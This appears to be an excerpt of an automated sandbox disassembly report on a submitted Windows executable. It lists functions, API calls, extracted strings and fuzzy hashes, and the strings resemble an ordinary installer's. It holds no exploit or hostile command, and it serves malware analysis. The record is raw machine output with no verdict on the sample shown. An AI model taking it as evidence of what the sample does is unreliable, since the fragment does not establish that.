                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041B1E0 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0041A650: CreateBrushIndirect.GDI32 ref: 0041A6BB
                                                                          • UnrealizeObject.GDI32(00000000), ref: 0041B1EC
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B1FE
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B221
                                                                          • SetBkMode.GDI32(?,00000002), ref: 0041B22C
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B247
                                                                          • SetBkMode.GDI32(?,00000001), ref: 0041B252
                                                                            • Part of subcall function 00419FC8: GetSysColor.USER32(?), ref: 00419FD2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                          • String ID:
                                                                          • API String ID: 3527656728-0
                                                                          • Opcode ID: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
                                                                          • Instruction ID: 2be34f36c4bf399c8fa5e8a938e63ded300dcfd20fe04f8c9e05bbd916d2a40e
                                                                          • Opcode Fuzzy Hash: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
                                                                          • Instruction Fuzzy Hash: 84F0BFB1511101ABCE00FFBAD9CAE4B27A89F443097048057B944DF19BC63CDC504B3E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00471F48 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00471F9E
                                                                          • 73A259E0.USER32(00000000,000000FC,00471EFC,00000000,0047212E,?,00000000,00472153), ref: 00471FC5
                                                                          • GetACP.KERNEL32(00000000,0047212E,?,00000000,00472153), ref: 00472002
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00472048
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A259ClassInfoMessageSend
                                                                          • String ID: COMBOBOX
                                                                          • API String ID: 3217714596-1136563877
                                                                          • Opcode ID: a3bd4216b25518833be08f838b902464fe38388dc9eea001a84ca35ef0d36fcc
                                                                          • Instruction ID: 8d6e69cdc7b25736ecace23fa1d294beb101704f1944a8432741b73acccf4278
                                                                          • Opcode Fuzzy Hash: a3bd4216b25518833be08f838b902464fe38388dc9eea001a84ca35ef0d36fcc
                                                                          • Instruction Fuzzy Hash: 1D513E34A002459FCB10DF69D985A9DB7F5FB49304F51C0BAE908AB762C778AD41CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00452240 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045232F
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045233F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFileHandle
                                                                          • String ID: .tmp$AI$_iu
                                                                          • API String ID: 3498533004-3125386451
                                                                          • Opcode ID: c39a4d1d708061c95ee7f24ecf83207fce97cc026b21afb8cbe7964c222690aa
                                                                          • Instruction ID: 46d0d6ad35c06494b98f164fbe74fb59b710500a089b477c7385efe511c505c8
                                                                          • Opcode Fuzzy Hash: c39a4d1d708061c95ee7f24ecf83207fce97cc026b21afb8cbe7964c222690aa
                                                                          • Instruction Fuzzy Hash: 6F31B370A00219ABCB11EBA5C942B9EB7B5AF45309F20447BFD00B73C2D6785F0587AC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00491C14 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                          • ShowWindow.USER32(?,00000005,00000000,00491E79,?,?,00000000), ref: 00491C4A
                                                                            • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                            • Part of subcall function 00407210: SetCurrentDirectoryA.KERNEL32(00000000,?,00491C72,00000000,00491E45,?,?,00000005,00000000,00491E79,?,?,00000000), ref: 0040721B
                                                                            • Part of subcall function 0042D328: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D3B6,?,?,00000000,?,?,00491C7C,00000000,00491E45,?,?,00000005), ref: 0042D35D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                          • String ID: .dat$.msg$IMsg$Uninstall
                                                                          • API String ID: 3312786188-1660910688
                                                                          • Opcode ID: adcb6d261caac1f1c681534649e4f7bd50fa4d1ea24911b293324070d9d119a1
                                                                          • Instruction ID: 53767b7cbe00aacee5155422e2e832e8fb1e8c52b774a8ea4378669dcc18a7ad
                                                                          • Opcode Fuzzy Hash: adcb6d261caac1f1c681534649e4f7bd50fa4d1ea24911b293324070d9d119a1
                                                                          • Instruction Fuzzy Hash: 6B31C574A006059FCB11EF65CC52D5E7BB5FB85304F60857AF800AB7A1DB78AD00CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004019CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(00494420,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                          • RtlEnterCriticalSection.KERNEL32(00494420,00494420,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,00494420,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                          • RtlLeaveCriticalSection.KERNEL32(00494420,00401A89,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID: dIe
                                                                          • API String ID: 730355536-2902252405
                                                                          • Opcode ID: b56a4cd114446b0773a66c7a27bb32d6b05b92adddc21732bf39a310c4c109fc
                                                                          • Instruction ID: aa962e87e2017aa174224405feb2f066e475dbd7097569f409cdfcf28ecb4bd2
                                                                          • Opcode Fuzzy Hash: b56a4cd114446b0773a66c7a27bb32d6b05b92adddc21732bf39a310c4c109fc
                                                                          • Instruction Fuzzy Hash: E401AD706442405EEB19AB69E812F253ED4D7D574CF11843BF540A6AF1C67C4843CB2D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00472DB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00472DB8
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00472EAF,00494F8C,00000000), ref: 00472DCB
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00472DD1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                          • String ID: AllowSetForegroundWindow$user32.dll
                                                                          • API String ID: 1782028327-3855017861
                                                                          • Opcode ID: c43b6504bda33aa8a25e434dc5dae65070d08f477b8a573627ea55408e2f79eb
                                                                          • Instruction ID: 0d6554dd73869eefd80f1f1d64911f0ce37f8ea1c6ebe10b7f66a80c05d08a0e
                                                                          • Opcode Fuzzy Hash: c43b6504bda33aa8a25e434dc5dae65070d08f477b8a573627ea55408e2f79eb
                                                                          • Instruction Fuzzy Hash: C7D0C7A16057016AD97077F5CE47DDF229CCD84755B14C43F7408F6186DABCE801997D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00416B9C Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • BeginPaint.USER32(00000000,?), ref: 00416BC2
                                                                          • SaveDC.GDI32(?), ref: 00416BF3
                                                                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416CB5), ref: 00416C54
                                                                          • RestoreDC.GDI32(?,?), ref: 00416C7B
                                                                          • EndPaint.USER32(00000000,?,00416CBC,00000000,00416CB5), ref: 00416CAF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                          • String ID:
                                                                          • API String ID: 3808407030-0
                                                                          • Opcode ID: c06abe95da4831753d63b9634986ca39a884699dacb8f14d7531f4240f3d7fe3
                                                                          • Instruction ID: 41fb8ea60d97978a9acdf236596d3a8a0d8a1996066437b2b943a95edf1585a8
                                                                          • Opcode Fuzzy Hash: c06abe95da4831753d63b9634986ca39a884699dacb8f14d7531f4240f3d7fe3
                                                                          • Instruction Fuzzy Hash: BF414E70A042049FDB14DB99C989FAA77F9EB48304F1580AEE4459B362D778DD40CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00414770 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 50d6a748b1b1338860e82f27f8761871ff193d734180217a0f8d82b491afa6e7
                                                                          • Instruction ID: 41a7722d09b35ce9ade17cd18fdec9692d257bae8bd1aa266952c484067d5cda
                                                                          • Opcode Fuzzy Hash: 50d6a748b1b1338860e82f27f8761871ff193d734180217a0f8d82b491afa6e7
                                                                          • Instruction Fuzzy Hash: D3311F746047409FC320EB69C584BABB7E8AF89714F04991EF9E5C7791D738EC818B19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042973C Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429778
                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004297A7
                                                                          • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 004297C3
                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 004297EE
                                                                          • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042980C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: fe9210cf49636514123fe8028928f87ce2f158866a525e02be5b173165c2f537
                                                                          • Instruction ID: 5c059f72bad19c8464015bcf3ba3f3fa2ba546ca9f5ab3c2e37583cf1b766786
                                                                          • Opcode Fuzzy Hash: fe9210cf49636514123fe8028928f87ce2f158866a525e02be5b173165c2f537
                                                                          • Instruction Fuzzy Hash: 2E217F70710714BAE710ABA6DC82F5B77ACEB46708F90443EB501BB3D2DB78AD41865C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041BB28 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BB3A
                                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BB44
                                                                          • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BB82
                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BCED,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BBC9
                                                                          • DeleteObject.GDI32(00000000), ref: 0041BC0A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MetricsSystem$A26310A570DeleteObject
                                                                          • String ID:
                                                                          • API String ID: 4277397052-0
                                                                          • Opcode ID: cb0e2adf6529593e89f90c831e9305c3e05f521d232314fc64d16b3fc11dbc77
                                                                          • Instruction ID: e64c8cfb77975bfe1c5019289902123c5e37d94f13133d85ba8c481b6df62587
                                                                          • Opcode Fuzzy Hash: cb0e2adf6529593e89f90c831e9305c3e05f521d232314fc64d16b3fc11dbc77
                                                                          • Instruction Fuzzy Hash: 91316F74E00609EFDB00DFA5C941AAEB7F4EB48700F10846AF510AB781D7389E80DB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0046EDFC Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0045B370: SetLastError.KERNEL32(00000057,00000000,0045B43C,?,?,?,?,00000000), ref: 0045B3DB
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,0046EED0,?,?,00000001,004950AC), ref: 0046EE89
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,0046EED0,?,?,00000001,004950AC), ref: 0046EE9F
                                                                          Strings
                                                                          • Setting permissions on registry key: %s\%s, xrefs: 0046EE4E
                                                                          • Could not set permissions on the registry key because it currently does not exist., xrefs: 0046EE93
                                                                          • Failed to set permissions on registry key (%d)., xrefs: 0046EEB0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                          • API String ID: 1452528299-4018462623
                                                                          • Opcode ID: 55a67c74d7be1f49e0db02a0eeb01d23dee57b17d7fb2968d2e0597982d68bfc
                                                                          • Instruction ID: df05376805d2ea433cd9e8d9b9222adeaa9c52dcffddc60509e69f4445759fc8
                                                                          • Opcode Fuzzy Hash: 55a67c74d7be1f49e0db02a0eeb01d23dee57b17d7fb2968d2e0597982d68bfc
                                                                          • Instruction Fuzzy Hash: 4621F534A046445FCF00DBAAC8816AEBBF5DB49314F50417BF404E7392E7795D058B6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 262959230-0
                                                                          • Opcode ID: bbd83879051bbb61c82a419d540aea94b1d83442c47b8cdfd9cb13069dd9a881
                                                                          • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                          • Opcode Fuzzy Hash: bbd83879051bbb61c82a419d540aea94b1d83442c47b8cdfd9cb13069dd9a881
                                                                          • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00414350 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414389
                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414391
                                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143A5
                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143AB
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A122A18830$A480
                                                                          • String ID:
                                                                          • API String ID: 3325508737-0
                                                                          • Opcode ID: 194e3fff164acdd9274630c615ac113e6c237e1a8584744cad8ee02aea33715e
                                                                          • Instruction ID: 94861c3129a932f854b236b0087f7367a4de39103189020794ca85cb03cdcc47
                                                                          • Opcode Fuzzy Hash: 194e3fff164acdd9274630c615ac113e6c237e1a8584744cad8ee02aea33715e
                                                                          • Instruction Fuzzy Hash: 6F01DF7121C3806AD200B63E8C85A9F6BED8FCA314F15556EF498DB382CA7ACC018765
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0047509C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,00476895,?,00000000,00000000,00000001,00000000,00475339,?,00000000), ref: 004752FD
                                                                          Strings
                                                                          • Failed to parse "reg" constant, xrefs: 00475304
                                                                          • XPG, xrefs: 00475196
                                                                          • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00475171
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant$XPG
                                                                          • API String ID: 3535843008-221462518
                                                                          • Opcode ID: 2ad844ec3d3387f5df215a59a8183cae574ced7ce954c6da98f45587ceaedfea
                                                                          • Instruction ID: efa73f53bf694626ca38b284cffe8b81a50960838d42bcbe4388b938de67f833
                                                                          • Opcode Fuzzy Hash: 2ad844ec3d3387f5df215a59a8183cae574ced7ce954c6da98f45587ceaedfea
                                                                          • Instruction Fuzzy Hash: 2C814174E00548AFCB10EF95C881ADEBBF9AF44355F50816AE814FB391D778AE05CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00424C50 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0041EFE4: GetActiveWindow.USER32 ref: 0041EFE7
                                                                            • Part of subcall function 0041EFE4: GetCurrentThreadId.KERNEL32 ref: 0041EFFC
                                                                            • Part of subcall function 0041EFE4: 73A25940.USER32(00000000,Function_0001EFC0), ref: 0041F002
                                                                            • Part of subcall function 00423118: GetSystemMetrics.USER32(00000000), ref: 0042311A
                                                                          • OffsetRect.USER32(?,?,?), ref: 00424D39
                                                                          • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424DFC
                                                                          • OffsetRect.USER32(?,?,?), ref: 00424E0D
                                                                            • Part of subcall function 004234D4: GetCurrentThreadId.KERNEL32 ref: 004234E9
                                                                            • Part of subcall function 004234D4: SetWindowsHookExA.USER32(00000003,00423490,00000000,00000000), ref: 004234F9
                                                                            • Part of subcall function 004234D4: CreateThread.KERNEL32(00000000,000003E8,00423440,00000000,00000000), ref: 0042351D
                                                                            • Part of subcall function 00424A9C: SetTimer.USER32(00000000,00000001,?,00423424), ref: 00424AB7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CurrentOffsetRect$A25940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                                          • String ID: KB
                                                                          • API String ID: 1906964682-1869488878
                                                                          • Opcode ID: ba4daf257325cbcca7612a03de97b8ebc6b1ca257ff465a9f0c405e7408712a1
                                                                          • Instruction ID: ae1ca80dbbb80d562d58c988e2a096fec0eb4d76cb14d5a08aa48516f4e8acc9
                                                                          • Opcode Fuzzy Hash: ba4daf257325cbcca7612a03de97b8ebc6b1ca257ff465a9f0c405e7408712a1
                                                                          • Instruction Fuzzy Hash: 89811771A002189FDB14DFA8D884ADEBBB5FF48314F5045AAE904AB296DB38AD45CF44
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406F0C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406F6B
